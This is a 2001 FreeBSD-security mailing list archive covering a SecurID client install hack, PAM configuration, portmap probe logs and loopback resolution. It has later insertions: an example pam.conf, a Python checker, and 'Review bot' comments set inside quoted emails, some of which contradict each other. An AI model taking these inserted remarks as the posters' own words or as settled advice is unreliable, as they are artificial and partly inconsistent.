From owner-freebsd-security Sun May 6 4:49:49 2001
From: ark@eltex.ru
To: jrishaw@playboy.com (jamie rishaw)
Cc: freebsd-security@FreeBSD.ORG, jamie@playboy.com
Date: Sun, 6 May 2001 01:47:16 +0400 (MSD)
Subject: Re: RSA SecurID Client on FreeBSD: Summary
Message-Id: <200105052147.BAA08093@paranoid.eltex.ru>
In-Reply-To: <20010504133228.D21698@playboy.com> from "jamie rishaw" at May 04, 2001 01:32:28 PM

nuqneH,

Sorry, duplicated my message by accident. I am just curious if someone already tried that.

_ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one!
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 6 4:49:52 2001
From: ark@eltex.ru
To: jrishaw@playboy.com (jamie rishaw)
Cc: freebsd-security@FreeBSD.ORG, jamie@playboy.com
Date: Sun, 6 May 2001 01:45:00 +0400 (MSD)
Subject: Re: RSA SecurID Client on FreeBSD: Summary
Message-Id: <200105052145.BAA08086@paranoid.eltex.ru>
In-Reply-To: <20010504133228.D21698@playboy.com> from "jamie rishaw" at May 04, 2001 01:32:28 PM

nuqneH,

Hmm, why not just re-implement it in software? It will take more time, but it _is_ the proper, reliable solution: no playing with binaries, etc.

> I figured it out.
>
> I posted to the list after probably a week plus of hacking around,
> and while this isn't the most elegant solution, it works.

_ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one!
From owner-freebsd-security Sun May 6 17:00:41 2001
From: "David W. Chapman Jr." <dwcjr@inethouston.net>
To: freebsd-security@freebsd.org
Date: Sun, 6 May 2001 19:00:43 -0500
Subject: pr ports/26957 and ports/26976 (pam modules)
Message-ID: <003101c0d688$c2a58e60$931576d8@inethouston.net>

I'm posting to this list sort of as a last resort. I submitted the PRs above, and the modules have been reported by their authors to work on FreeBSD; I just cannot figure out what I need to put in my pam.conf. They give Linux examples that I tried to modify for FreeBSD, but the bottom line was it wouldn't work. If anyone has any ideas, I would appreciate it, so I could put it in the pkg-message and everyone would know how.
From owner-freebsd-security Sun May 6 18:39:25 2001
From: "David W. Chapman Jr." <dwcjr@inethouston.net>
To: "Derek Ragona"
Cc: freebsd-security@freebsd.org
Date: Sun, 6 May 2001 20:39:25 -0500
Subject: Re: pr ports/26957 and ports/26976 (pam modules)
Message-ID: <007701c0d696$8c45d880$931576d8@inethouston.net>
References: <5.1.0.14.2.20010506191044.00a30a60@computinginnovations.com>

My pam.conf file is up to date, but I just can't get PAM to use the modules. I don't see any network traffic when I log in.

----- Original Message -----
From: Derek Ragona
To: David W. Chapman Jr.
Sent: Sunday, May 06, 2001 7:15 PM
Subject: Re: pr ports/26957 and ports/26976 (pam modules)

Not sure what exactly your problem is, but you need all the pam.conf entries for the version of FreeBSD, or stuff breaks. If you upgraded, look in /etc/upgrade for a pam.conf you can use.
This has been a problem for any upgrade in the 4.X FreeBSDs; in fact, I just upgraded two servers from 4.2 to 4.3 and had some troubles that were cured when I copied the pam.conf file from /etc/upgrade to /etc.

Hope this helps.

        -Derek
From owner-freebsd-security Mon May 7 3:16:01 2001
From: Peter Pentchev <roam@orbitel.bg>
To: "David W. Chapman Jr."
Cc: freebsd-security@freebsd.org
Date: Mon, 7 May 2001 13:14:07 +0300
Subject: Re: pr ports/26957 and ports/26976 (pam modules)
Message-ID: <20010507131407.A39862@ringworld.oblivion.bg>
In-Reply-To: <003101c0d688$c2a58e60$931576d8@inethouston.net>; from dwcjr@inethouston.net on Sun, May 06, 2001 at 07:00:43PM -0500

On Sun, May 06, 2001 at 07:00:43PM -0500, David W. Chapman Jr. wrote:
> I'm posting to this list sort of as a last resort. I submitted the pr's
> above and the modules have been reported to work by the authors on freebsd,
> I just cannot figure out what I need to put in my pam.conf. they give linux
> examples that I tried to modify to freebsd, but bottom line was it wouldn't
> work. If anyone has any ideas, I would appreciate it so I could put it in
> the pkg-message so everyone would know how.

Can you see if PR bin/27153 helps any?

G'luck,
Peter

-- 
This sentence contradicts itself - or rather - well, no, actually it doesn't!
From owner-freebsd-security Mon May 7 7:48:14 2001
From: Server Administrator <support@dslglobal.net>
To: freebsd-security@freebsd.org
Date: Mon, 07 May 2001 23:00:01 +0800
Subject: Re: portmap attacks?
Message-Id: <3.0.6.32.20010507230001.0107a9f0@mail.dslglobal.net>

May 8 08:29:36 classic portmap[10832]: connect from 208.220.74.5 to dump(): request from unauthorized host
May 8 08:39:18 classic portmap[10908]: connect from 211.105.145.61 to dump(): request from unauthorized host
May 8 11:33:24 classic portmap[12219]: connect from 209.26.30.68 to dump(): request from unauthorized host

From owner-freebsd-security Mon May 7 9:06:14 2001
Message-ID: <021401c0d70f$a4e92d00$931576d8@inethouston.net>
From: "David W. Chapman Jr." <dwcjr@inethouston.net>
To: "Peter Pentchev"
Cc: freebsd-security@freebsd.org
Date: Mon, 7 May 2001 11:06:15 -0500
Subject: Re: pr ports/26957 and ports/26976 (pam modules)
References: <003101c0d688$c2a58e60$931576d8@inethouston.net> <20010507131407.A39862@ringworld.oblivion.bg>

That looks like my problem, but I don't do any programming, so I'll have to wait for the fix. Thank you for pointing me towards this, though.

----- Original Message -----
From: "Peter Pentchev"
To: "David W. Chapman Jr."
Cc: freebsd-security@freebsd.org
Sent: Monday, May 07, 2001 5:14 AM
Subject: Re: pr ports/26957 and ports/26976 (pam modules)

> Can you see if PR bin/27153 helps any?

From owner-freebsd-security Mon May 7 9:23:48 2001
From: Peter Pentchev <roam@orbitel.bg>
To: "David W. Chapman Jr."
Cc: freebsd-security@freebsd.org
Date: Mon, 7 May 2001 19:21:56 +0300
Subject: Re: pr ports/26957 and ports/26976 (pam modules)
Message-ID: <20010507192156.I39862@ringworld.oblivion.bg>
In-Reply-To: <021401c0d70f$a4e92d00$931576d8@inethouston.net>; from dwcjr@inethouston.net on Mon, May 07, 2001 at 11:06:15AM -0500

There is a patch there; can you try to recompile your login with it, and see if it helps?

G'luck,
Peter

-- 
If you think this sentence is confusing, then change one pig.

On Mon, May 07, 2001 at 11:06:15AM -0500, David W. Chapman Jr. wrote:
> That looks like my problem, but I don't do any programming so I'll have to
> wait for the fix. Thank you for pointing me towards this though.
> 
> ----- Original Message -----
> From: "Peter Pentchev"
> To: "David W. Chapman Jr."
> Cc: freebsd-security@freebsd.org
> Sent: Monday, May 07, 2001 5:14 AM
> Subject: Re: pr ports/26957 and ports/26976 (pam modules)
> 
> 
> > Can you see if PR bin/27153 helps any?
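Added example for the pam.conf question in this thread. It is not from any of the posters and not from the ports in the two PRs; the module name pam_example.so and its install path are placeholders. It shows a FreeBSD 4.x-style /etc/pam.conf stanza that puts a third-party authentication module in front of pam_unix for login, with the control flag chosen deliberately, since the flag decides what a user sees when the module fails to load or its server is unreachable. Assumptions: on 4.x a bare module name is resolved relative to /usr/lib, so a module installed by a port under /usr/local/lib must be given with its full path, and the non-placeholder lines mirror the stock 4.x login entries as recalled here; compare them against the pam.conf shipped with your release before copying.

```text
# /etc/pam.conf, FreeBSD 4.x format:
#   service  type      control     module-path                      [arguments]
#
# pam_example.so is a hypothetical third-party module standing in for the
# ones from ports/26957 and ports/26976. Give the full path: a bare name is
# looked up under /usr/lib, and a module that cannot be found is never run,
# which shows up as exactly the symptom above (no network traffic, no prompt,
# login silently falling through to the next line).
#
# "sufficient": if pam_example succeeds, pam_unix below is skipped; if it
# fails or cannot be loaded, login degrades to the ordinary password check.
# Use "required" instead if the token must always be presented; then an
# unreachable auth server locks everyone out of login, so keep a console
# path that does not go through this stanza.
login    auth      sufficient  /usr/local/lib/pam_example.so
login    auth      required    pam_unix.so                      try_first_pass
login    account   required    pam_unix.so
login    password  required    pam_permit.so
login    session   required    pam_permit.so
```

Two checks before blaming the configuration: `ldd /usr/local/lib/pam_example.so` shows whether the module's own dependencies resolve (an unresolvable symbol makes libpam skip it with no visible error at the login prompt), and the program you are testing through must itself use PAM on your release; the PR Peter points at above concerns the login side.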
From owner-freebsd-security Mon May 7 9:55:37 2001
From: "Crist Clark" <crist.clark@globalstar.com>
To: Sheldon Hearn
Cc: anderson@centtech.com, Andrew Barros, "lists@mail.ru", freebsd-security@FreeBSD.ORG
Date: Mon, 07 May 2001 09:54:36 -0700
Subject: Re: reverse or not
Message-ID: <3AF6D34C.AE6A479F@globalstar.com>
References: <65662.989052290@axl.fw.uunet.co.za>

Sheldon Hearn wrote:
> 
> On Fri, 04 May 2001 08:17:00 EST, Eric Anderson wrote:
> 
> > I think if you have (in your /etc/host.conf) bind listed before hosts
> > (meaning it will ask the dns server before looking at the hosts file),
> > it would delay if the dns server doesn't have a reverse entry for
> > 127.0.0.1 [...]
> 
> From a security perspective, I'm pretty sure that hosts should NEVER
> rely on any external source for resolution on the loopback network.

So everyone MUST run a DNS server on localhost? That does not sound too
secure either.
-- 
Crist J. Clark                                Network Security Engineer
crist.clark@globalstar.com                    Globalstar, L.P.
(408) 933-4387                                FAX: (408) 933-4926

The information contained in this e-mail message is confidential,
intended only for the use of the individual or entity named above.
If the reader of this e-mail is not the intended recipient, or the
employee or agent responsible to deliver it to the intended recipient,
you are hereby notified that any review, dissemination, distribution or
copying of this communication is strictly prohibited. If you have
received this e-mail in error, please contact postmaster@globalstar.com

From owner-freebsd-security Mon May 7 10:00:29 2001
From: Sheldon Hearn <sheldonh@uunet.co.za>
To: "Crist Clark"
Cc: anderson@centtech.com, Andrew Barros, "lists@mail.ru", freebsd-security@freebsd.org
Date: Mon, 07 May 2001 18:58:51 +0200
Subject: Re: reverse or not
Message-ID: <98864.989254731@axl.fw.uunet.co.za>
In-reply-to: Your message of "Mon, 07 May 2001 09:54:36 MST." <3AF6D34C.AE6A479F@globalstar.com>

On Mon, 07 May 2001 09:54:36 MST, "Crist Clark" wrote:

> > From a security perspective, I'm pretty sure that hosts should NEVER
> > rely on any external source for resolution on the loopback network.
> 
> So everyone MUST run a DNS server on localhost? That does not sound too
> secure either.
That's not what I'm suggesting. People were talking about /etc/hosts vs
DNS. I'm saying that

1) DNS servers shouldn't answer questions about the loopback
   network.

2) Hosts should have hostnames for the loopback network
   hardwired into /etc/hosts.

Ciao,
Sheldon.

From owner-freebsd-security Mon May 7 11:02:35 2001
From: Wes Peters <wes@softweyr.com>
To: Sheldon Hearn
Cc: Crist Clark, anderson@centtech.com, Andrew Barros, "lists@mail.ru", freebsd-security@freebsd.org
Date: Mon, 7 May 2001 12:01:41 -0600 (MDT)
Subject: Re: reverse or not
In-Reply-To: <98864.989254731@axl.fw.uunet.co.za> from Sheldon Hearn at "May 7, 2001 06:58:51 pm"

Sheldon Hearn scribed:
> 
> On Mon, 07 May 2001 09:54:36 MST, "Crist Clark" wrote:
> 
> > > From a security perspective, I'm pretty sure that hosts should NEVER
> > > rely on any external source for resolution on the loopback network.
> > 
> > So everyone MUST run a DNS server on localhost? That does not sound too
> > secure either.
> 
> That's not what I'm suggesting. People were talking about /etc/hosts vs
> DNS. I'm saying that
> 
> 1) DNS servers shouldn't answer questions about the loopback
>    network.
> 
> 2) Hosts should have hostnames for the loopback network
>    hardwired into /etc/hosts.

3) /etc/host.conf should always have hosts listed before
   bind, to be sure that you get your local definitions
   *first*.

-- 
Sorry, no .sig at this moment.

From owner-freebsd-security Mon May 7 11:24:31 2001
From: "Crist Clark" <crist.clark@globalstar.com>
To: Wes Peters
Cc: Sheldon Hearn, anderson@centtech.com, Andrew Barros, "lists@mail.ru", freebsd-security@FreeBSD.ORG
Date: Mon, 07 May 2001 11:24:24 -0700
Subject: Re: reverse or not
Message-ID: <3AF6E858.77E9B72A@globalstar.com>

Wes Peters wrote:
> 
> Sheldon Hearn scribed:
> > 
> > On Mon, 07 May 2001 09:54:36 MST, "Crist Clark" wrote:
> > 
> > > > From a security perspective, I'm pretty sure that hosts should NEVER
> > > > rely on any external source for resolution on the loopback network.
> > > 
> > > So everyone MUST run a DNS server on localhost? That does not sound too
> > > secure either.
> > 
> > That's not what I'm suggesting. People were talking about /etc/hosts vs
> > DNS. I'm saying that
> > 
> > 1) DNS servers shouldn't answer questions about the loopback
> >    network.
> > 
> > 2) Hosts should have hostnames for the loopback network
> >    hardwired into /etc/hosts.
> 
> 3) /etc/host.conf should always have hosts listed before
>    bind, to be sure that you get your local definitions
>    *first*.

I was thinking of applications like sendmail(8) that don't bother with
the local resolver and really like to go straight to DNS. /etc/hosts and
/etc/host.conf are moot. I have had "localhost" problems with sendmail
in the past that were a PITA to work around. I know there are other
common apps that go straight to DNS... 'course none of them are coming
to mind at the moment.
-- 
Crist J. Clark                                Network Security Engineer
crist.clark@globalstar.com                    Globalstar, L.P.
(408) 933-4387                                FAX: (408) 933-4926

From owner-freebsd-security Mon May 7 11:42:03 2001
From: jamie rishaw <jamie@playboy.com>
Date: Mon, 7 May 2001 13:41:46 -0500
To: "Geoffrey T. Falk"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: RSA SecurID Client on FreeBSD: Summary
Message-ID: <20010507134146.G22195@playboy.com>
References: <20010504133228.D21698@playboy.com> <200105041914.NAA10067@h-209-91-79-2.gen.cadvision.com>
In-Reply-To: <200105041914.NAA10067@h-209-91-79-2.gen.cadvision.com>; from gtf@cirp.org on Fri, May 04, 2001 at 01:14:46PM -0600

Well, yeah, but I'm an NTP geek.. I have ntp synched on everything I
touch, routers, switches, boxen.. My peer list is sickening.. But it's
oh so useful. Especially during computer forensics.. Knowing that the
time sequence is not off by more than +/- 0.01 seconds on everything in
the network proves invaluable.

jamie

On Fri, May 04, 2001 at 01:14:46PM -0600, Geoffrey T. Falk wrote:
> I bet you also need to have NTP set up, otherwise the token will be out
> of sync with your server.. :-)
> 
> Geoffrey
> 

-- 
jamie rishaw
sr. wan/unix engineer/ninja // playboy enterprises inc.
opinions stated are mine, and are not necessarily those of the bunny.
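Added example for the "reverse or not" exchange above (Sheldon's three points and Wes's ordering rule), written for this page rather than taken from any poster: a small Python check that parses a FreeBSD 4.x-style /etc/host.conf and /etc/hosts and reports when loopback names would be answered by DNS before the local file, or are missing or mapped to a routable address locally. The two sample file contents are constructed; the example.net names and 192.0.2.x addresses are placeholders, and the parser handles `#` comments and blank lines as the real files do.

```python
"""Check that loopback names resolve from local files, never via DNS first."""
import ipaddress

# Constructed sample files (hypothetical contents, not from any poster's host).
GOOD_HOST_CONF = """\
# $FreeBSD$
# First try the /etc/hosts file
hosts
# Now try the nameserver next.
bind
"""

BAD_HOST_CONF = """\
bind
hosts
"""

GOOD_HOSTS = """\
::1\t\t\tlocalhost localhost.example.net
127.0.0.1\t\tlocalhost localhost.example.net
192.0.2.10\t\tgw.example.net gw
"""

# Constructed broken file: no 127.0.0.1 line, and "localhost" hung off a
# routable address, which is what a tampered or mis-merged hosts file looks like.
BAD_HOSTS = """\
192.0.2.10\t\tgw.example.net gw localhost
"""


def parse_host_conf(text):
    """Return the lookup order from host.conf as a list of lower-case names."""
    order = []
    for line in text.splitlines():
        entry = line.split("#", 1)[0].strip()
        if entry:
            order.append(entry.lower())
    return order


def parse_hosts(text):
    """Return [(ip_address, [names...]), ...] from /etc/hosts-format text."""
    entries = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # skip malformed lines rather than trusting them
        entries.append((addr, fields[1:]))
    return entries


def reverse_lookup(hosts_text, ip):
    """Resolve an address to its canonical name using only /etc/hosts."""
    target = ipaddress.ip_address(ip)
    for addr, names in parse_hosts(hosts_text):
        if addr == target:
            return names[0]
    return None


def check_loopback_resolution(host_conf_text, hosts_text):
    """Return a list of findings; an empty list means the two files are sane."""
    findings = []

    order = parse_host_conf(host_conf_text)
    if "hosts" not in order:
        findings.append("host.conf: /etc/hosts is never consulted")
    elif "bind" in order and order.index("bind") < order.index("hosts"):
        findings.append("host.conf: bind listed before hosts, so DNS answers "
                        "loopback lookups first")

    entries = parse_hosts(hosts_text)
    v4_loopback = ipaddress.ip_address("127.0.0.1")
    if not any(addr == v4_loopback and "localhost" in names
               for addr, names in entries):
        findings.append("hosts: no 127.0.0.1 localhost entry")
    for addr, names in entries:
        if "localhost" in names and not addr.is_loopback:
            findings.append(
                f"hosts: localhost mapped to non-loopback address {addr}")
    return findings


if __name__ == "__main__":
    for label, conf, hosts in (("good", GOOD_HOST_CONF, GOOD_HOSTS),
                               ("bad", BAD_HOST_CONF, BAD_HOSTS)):
        print(label, check_loopback_resolution(conf, hosts) or "OK")
```

The check covers the two things a host can control locally: the order in host.conf and the content of /etc/hosts. It cannot help with programs that bypass the resolver and query DNS directly, which is Crist's point about sendmail; for those, Sheldon's first rule, that the name server should not answer for the loopback network at all, is the only control that applies.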
From owner-freebsd-security Mon May 7 11:51:51 2001
From: "Eric D. Futch" <efutch@nyct.net>
To: freebsd-security@freebsd.org
Date: Mon, 7 May 2001 14:51:38 -0400 (EDT)
Subject: Re: RSA SecurID Client on FreeBSD: Summary
Message-ID: <20010507145010.P60366-100000@bsd1.nyct.net>
In-Reply-To: <20010504133228.D21698@playboy.com>

I had word from someone at RSA that they have just completed a SecurID
client for FreeBSD based on 4.2. They were just waiting for the changes
to be made to the web site.

-- 
Eric Futch                                New York Connect.Net, Ltd.
efutch@nyct.net                           Technical Support Staff
http://www.nyct.net                       (212) 293-2620
    "Bringing New York The Internet Service It Deserves"
KNYC: 07-May-01 13:51 EDT: 61.0 F (16.1 C), clear, humidity 49%


On Fri, 4 May 2001, jamie rishaw wrote:

>I figured it out.
>
> I posted to the list after probably a week plus of hacking around,
>and while this isn't the most elegant solution, it works.
>
> I don't want to provide support, but for sake of list archives and
>other people's sanity, here are the basic steps I took:
>
> - Grab Linux SecurID client off of RSA site at
>   http://www.rsasecurity.com/download/linux/
> - Un-tar/decompress
> - (Kludge) FreeBSD apparently doesn't have the linux "/bin/line"
>   equiv, which is what the `sdsetup` program uses.
>   So, change
>   lines in sdsetup to substitute `$LINE_EXEC` (with quotes) to
>   anticipated response, like 'y' for 'yes' and 'n' for 'no', and
>   directory or pathnames as needed.
>   (I'll include a diff at the end of this email)
> - Grab the sdconf.rec from /top/ace/.. on your SecurID server and
>   put it in your $CWD
> - Run ./sdsetup -client
> - Add a test user with shell /top/ace/prog/sdshell
> - Add this box to your ACE/Server as a client and add user auth
>   as you would any other new client
> - Verify, run, go.
>
> You need to be running Linux compatibility.
>
> I make no guarantees or warranties whatsoever; I am relaying how
>*I* got it to work on systems here. If you do it and lock yourself
>out of your own boxes, don't come running to me. This only protects
>interactive login, I still have yet to tackle FTP, SCP, etc.
>
> Good luck
>
>jamie
>
>
>-- begin diff --
>103,109d102
>< if [ ! -f "$LINE_EXEC" ]
>< then
>< echo "#!/bin/sh" > /bin/line
>< echo "read i" >> /bin/line
>< echo "echo \$i" >> /bin/line
>< chmod 555 /bin/line
>< fi
>207c200
>< YESORNO=`$LINE_EXEC`
>---
>> YESORNO='y'
>1114c1107
>< create=`$LINE_EXEC`
>---
>> create='y'
>1188c1181
>< input=`$LINE_EXEC`
>---
>> input=''
>1281c1274
>< test_owner=`$LINE_EXEC`
>---
>> test_owner=rsa
>1316c1309
>< current_platform=`$LINE_EXEC`
>---
>> current_platform=freebsd
>1468c1461
>< test_type=`$LINE_EXEC`
>---
>> test_type=des
>1508c1501
>< test_path=`$LINE_EXEC`
>---
>> test_path=/usr/local/rsa
>1631c1624
>< create=`$LINE_EXEC`
>---
>> create=''
>
>-- end diff --
>
>
>On Fri, May 04, 2001 at 11:56:03AM -0500, jamie rishaw wrote:
>> Hi,
>>
>> I'm looking to chat either on- or off-list with people that have
>> successfully integrated RSA's SecurID into FreeBSD. Specifically,
>> the client side.
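Review bot: the left-hand side of the first hunk (103,109d102) is a fallback that writes a two-line sh shim to /bin/line when `$LINE_EXEC` is missing, which is exactly the `line(1)` replacement the cover text says FreeBSD lacks; dropping that block and hard-coding every answer in the eight hunks that follow is a larger and less portable change than keeping the shim. If the shim is what failed, the visible defect is `echo "echo \$i" >> /bin/line`, which produces an unquoted `echo $i` in the shim, so whatever is typed at the prompt gets word-split and glob-expanded before it is handed back; writing it as `echo 'echo "$i"' >> /bin/line` avoids that. Creating the file under /bin also drops a non-base file into the base system tree; on FreeBSD a locally added tool belongs under /usr/local/bin.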
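Review bot: hunk 1508c1501 hard-codes `test_path=/usr/local/rsa`, while the steps in the same post refer to the client tree as /top/ace (`sdconf.rec` from /top/ace/.., login shell /top/ace/prog/sdshell); the post should say which path the installer actually used, because a mismatch means sdsetup installs into one tree and the test user's shell points at another. The same hunk, together with 1281c1274 (`test_owner=rsa`), 1316c1309 and 1468c1461, bakes site-specific answers into the installer with no prompt, so anyone reusing this modified sdsetup inherits them silently; a comment at the top of the script listing the fixed answers would at least make that visible.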
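Review bot: hunk 1631c1624 answers the second `create` prompt with the empty string while hunk 1114c1107 answers the first with 'y'; an empty answer takes whatever default that prompt has, and the diff does not show what that is. Either give the intended answer explicitly ('y' or 'n') or add a comment saying what the prompt at that line asks, since a reader applying this diff cannot tell whether `create=''` means "do not create" or "accept the default". The `input=''` replacement in hunk 1188c1181 has the same problem.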
>>
>> There are no official clients, and when I try to compile commercial
>> SSH with SecurID support, I get "File format not recognized" when the
>> ssh daemon tries to link sdiclient.a symbols (sdiclient.a being the
>> file that the ACE server generates/holds for clients to link in and
>> talk/authenticate with). SSH.com has still yet to reply to my open
>> ticket with them...
>>
>> I have searched high and low for real answers, yet I cannot find
>> anyone that's been able to say, "Yes, I've done it, here's how".
>>
>> URLs, Pointers, etc., are all appreciated.
>>
>> thanks in advance,
>>
>> jamie
>> --
>> jamie rishaw
>> sr. wan/unix engineer/ninja // playboy enterprises inc.
>> opinions stated are mine, and are not necessarily those of the bunny.
>>
>
>--
>jamie rishaw
>sr. wan/unix engineer/ninja // playboy enterprises inc.
>opinions stated are mine, and are not necessarily those of the bunny.
>

From owner-freebsd-security Mon May 7 11:55:32 2001
From: jamie rishaw <jamie@playboy.com>
Date: Mon, 7 May 2001 13:55:15 -0500
To: "Eric D. Futch"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: RSA SecurID Client on FreeBSD: Summary
Message-ID: <20010507135515.H22195@playboy.com>
References: <20010504133228.D21698@playboy.com> <20010507145010.P60366-100000@bsd1.nyct.net>
In-Reply-To: <20010507145010.P60366-100000@bsd1.nyct.net>; from efutch@nyct.net on Mon, May 07, 2001 at 02:51:38PM -0400

Ah, christ. :-p

On Mon, May 07, 2001 at 02:51:38PM -0400, Eric D. Futch wrote:
> I had word from someone at RSA that they have just completed a SecurID
> client for FreeBSD based on 4.2. They were just waiting for the changes
> to be made to the web site.
> 
> -- 
> Eric Futch                                New York Connect.Net, Ltd.
> efutch@nyct.net                           Technical Support Staff
> http://www.nyct.net                       (212) 293-2620
>     "Bringing New York The Internet Service It Deserves"
> KNYC: 07-May-01 13:51 EDT: 61.0 F (16.1 C), clear, humidity 49%
> 
> 
> On Fri, 4 May 2001, jamie rishaw wrote:
> 
> >I figured it out.
> >
> > I posted to the list after probably a week plus of hacking around,
> >and while this isn't the most elegant solution, it works.
> >
> > I don't want to provide support, but for sake of list archives and
> >other people's sanity, here are the basic steps I took:
> >
> > - Grab Linux SecurID client off of RSA site at
> >   http://www.rsasecurity.com/download/linux/
> > - Un-tar/decompress
> > - (Kludge) FreeBSD apparently doesn't have the linux "/bin/line"
> >   equiv, which is what the `sdsetup` program uses. So, change
> >   lines in sdsetup to substitute `$LINE_EXEC` (with quotes) to
> >   anticipated response, like 'y' for 'yes' and 'n' for 'no', and
> >   directory or pathnames as needed.
> >   (I'll include a diff at the end of this email)
> > - Grab the sdconf.rec from /top/ace/..
on your SecurID server and > > put it in your $CWD > > - Run ./sdsetup -client > > - Add a test user with shell /top/ace/prog/sdshell > > - Add this box to your ACE/Server as a client and add user auth > > as you would any other new client > > - Verify, run, go. > > > > You need to be running Linux compatibility. > > > > I make no guarantees or warranties whatsoever; I am relaying how > >*I* got it to work on systems here. If you do it and lock yourself > >out of your own boxes, don't come running to me. This only protects > >interactive login, I still have yet to tackle FTP, SCP, etc. > > > > Good luck > > > >jamie > > > > > >-- begin diff -- > >103,109d102 > >< if [ ! -f "$LINE_EXEC" ] > >< then > >< echo "#!/bin/sh" > /bin/line > >< echo "read i" >> /bin/line > >< echo "echo \$i" >> /bin/line > >< chmod 555 /bin/line > >< fi > >207c200 > >< YESORNO=`$LINE_EXEC` > >--- > >> YESORNO='y' > >1114c1107 > >< create=`$LINE_EXEC` > >--- > >> create='y' > >1188c1181 > >< input=`$LINE_EXEC` > >--- > >> input='' > >1281c1274 > >< test_owner=`$LINE_EXEC` > >--- > >> test_owner=rsa > >1316c1309 > >< current_platform=`$LINE_EXEC` > >--- > >> current_platform=freebsd > >1468c1461 > >< test_type=`$LINE_EXEC` > >--- > >> test_type=des > >1508c1501 > >< test_path=`$LINE_EXEC` > >--- > >> test_path=/usr/local/rsa > >1631c1624 > >< create=`$LINE_EXEC` > >--- > >> create='' > > > >-- end diff -- > > > > > >On Fri, May 04, 2001 at 11:56:03AM -0500, jamie rishaw wrote: > >> Hi, > >> > >> I'm looking to chat either on- or off-list with people that have > >> successfully integrated RSA's SecurID into FreeBSD. Specifically, > >> the client side. > >> > >> There are no official clients, and when I try to compile commercial > >> SSH with SecurID support, I get "File format not recognized" when the > >> ssh daemon tries to link sdiclient.a symbols (sdiclient.a being the > >> file that the ACE server generates/holds for clients to link in and > >> talk/authenticate with). 
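Review bot: the block deleted by hunk 103,109d102 was the only thing that created /bin/line when `$LINE_EXEC` was missing, so once it is gone every remaining `$LINE_EXEC` call site in sdsetup has to be covered by one of the substitutions that follow; a `grep -n LINE_EXEC sdsetup` before running `./sdsetup -client` shows whether any were missed. Dropping it is also the safer outcome, since it stops the installer from writing a world-executable script into /bin.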
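Review bot: `YESORNO='y'` in hunk 207c200 answers that confirmation prompt unconditionally, so whatever check the prompt provided is gone; anyone reusing the diff should read the lines of sdsetup around 207 to see which question is being answered before taking the 'y' on trust.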
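Review bot: `input=''` in hunk 1188c1181 (and `create=''` in 1631c1624) accept the script's default for those prompts without recording what the default was; noting the chosen values in the write-up would make the install reproducible on the next box instead of depending on whatever the script falls back to.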
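Review bot: `test_owner=rsa` in hunk 1281c1274 assumes an `rsa` account already exists on the FreeBSD box, but the step list above only creates the test user with the sdshell login shell; the owner account should be added as an explicit step before `./sdsetup -client`, otherwise the ownership the installer sets on the client files will not be what it expects.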
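Review bot: `test_type=des` in hunk 1468c1461 fixes the type answer to DES for every install without a prompt; this has to agree with what the ACE/Server side is configured for, so the write-up should say the value was chosen to match the server rather than leaving it as an unexplained constant.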
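Review bot: `test_path=/usr/local/rsa` in hunk 1508c1501 does not obviously agree with the `/top/ace/prog/sdshell` login shell set in the steps above; confirm where sdsetup actually installs sdshell on the client (or that /top/ace points there) before changing any user's shell, since a login shell that does not exist is exactly the lock-out the message warns about.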
> > > SSH.com has still yet to reply to my open
> > > ticket with them...
> > >
> > > I have searched high and low for real answers, yet I cannot find
> > > anyone that's been able to say, "Yes, I've done it, here's how".
> > >
> > > URLs, Pointers, etc., are all appreciated.
> > >
> > > thanks in advance,
> > >
> > > jamie
> > > --
> > > jamie rishaw
> > > sr. wan/unix engineer/ninja // playboy enterprises inc.
> > > opinions stated are mine, and are not necessarily those of the bunny.
> > >
> >
> > --
> > jamie rishaw
> > sr. wan/unix engineer/ninja // playboy enterprises inc.
> > opinions stated are mine, and are not necessarily those of the bunny.
> >
>

--
jamie rishaw
sr. wan/unix engineer/ninja // playboy enterprises inc.
opinions stated are mine, and are not necessarily those of the bunny.

From owner-freebsd-security Mon May 7 12:12:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from moo.udder.org (moo.udder.org [207.183.249.210]) by hub.freebsd.org (Postfix) with ESMTP id 4B5A537B422 for ; Mon, 7 May 2001 12:12:29 -0700 (PDT) (envelope-from dave@moo.udder.org)
Received: (from dave@localhost) by moo.udder.org id f47JCNc72020 for freebsd-security@freebsd.org; Mon, 7 May 2001 12:12:23 -0700 (PDT)
Date: Mon, 7 May 2001 12:12:23 -0700
From: Dave Whitaker
To: freebsd-security@freebsd.org
Subject: Jails and FreeBSD4.3
Message-ID: <20010507121223.C33043@moo.udder.org>
Mail-Followup-To: freebsd-security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Organization: Quiknet Inc. Roseville, CA
X-Operating-System: FreeBSD moo.udder.org 3.5-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi All,

I recently installed FreeBSD 4.3, specifically wanting to mess with
jails. Everything appears to work fine, except I use apache with
mod_vhost_alias, and proftpd hosting several anonymous ftp sites. I
need to get the jail to bind to many IPs, rather than just one. Is
there any way to do this, or would anyone be willing to provide me
with a patch to do so?

Any help is appreciated.

Thanks,
Dave

From owner-freebsd-security Mon May 7 12:18:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from scribble.fsn.hu (scribble.fsn.hu [193.224.40.95]) by hub.freebsd.org (Postfix) with SMTP id D189337B424 for ; Mon, 7 May 2001 12:18:55 -0700 (PDT) (envelope-from bra@fsn.hu)
Received: (qmail 52919 invoked by uid 1000); 7 May 2001 19:18:49 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 May 2001 19:18:49 -0000
Date: Mon, 7 May 2001 21:18:49 +0200 (CEST)
